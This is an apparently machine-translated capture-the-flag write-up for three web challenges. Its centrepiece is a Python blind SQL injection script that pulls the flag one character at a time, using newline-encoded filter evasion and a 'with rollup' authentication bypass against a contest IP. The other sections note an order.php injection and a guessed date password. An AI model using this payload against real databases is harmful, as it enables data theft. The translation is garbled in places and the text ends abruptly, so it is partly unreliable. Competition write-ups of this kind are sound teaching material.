Redhat Web writeup

RedHat Web writeup
1, Thinkseeker
2, Phpmywind
3. Backstage

RedHat Web Writeup1, Thinkseeker

Two points in the exam
1, with rollup over the front two if
2. Find the flag with a blind note
About the 1th in the experiment it has the original title: http://www.shiyanbar.com/ctf/1940
The filtering method is slightly different, using the operator instead of the keyword. Tokens can be overridden with variables.
The 2nd is infoid this parameter has the blind note, the running script can get the flag.
Here is the script:

  
 

   
  

  
# -*- coding:utf-8 -*-
   
  

  
import requests
   
  

  
string = ‘‘
   
  

  
for i in range(1,63):
   
  

  
 for j in range(32,127):
   
  

  
 url="http://106.75.117.4:3083/?token=21232f297a57a5a743894a0e4a801fc3&infoid=1%0a%26%26%0aascii(substr((select%0agroup_concat(flag)%0afrom%0aflag)from({})for(1)))={}&userid=1%0a||%0a1%0agroup%0aby%0apassword%0awith%0arollup%0alimit%0a1%0aoffset%0a1&password=".format(i,j) 
   
  

  
 s=requests.get(url=url)
   
  

  
 content=s.content
   
  

  
 print i,j
   
  

  
 # 判断
   
  

  
 if "error sql!" not in content:
   
  

  
 string+=chr(j)
   
  

  
 break
   
  

  
 print string
  
 

Final Answer:

or SQL injection to do less, a lot of statements will not be written.

2, Phpmywind

This problem is too many loopholes, casually swept out of 3 XSS, I was persistent think is the topic of XSS, once thought it was their own XSS platform problem, in fact, is order.php below an injection, reference article http://0day5.com/archives/1442/
Note Set cookies to prevent jumps

After unlocking MD5, log in to the administrator and find this

Visit to get flag

3. Backstage

Brain hole, the password is the date 20170506

In fact, there is a flag.php in the root directory, I thought it was to read this file,

Redhat Web writeup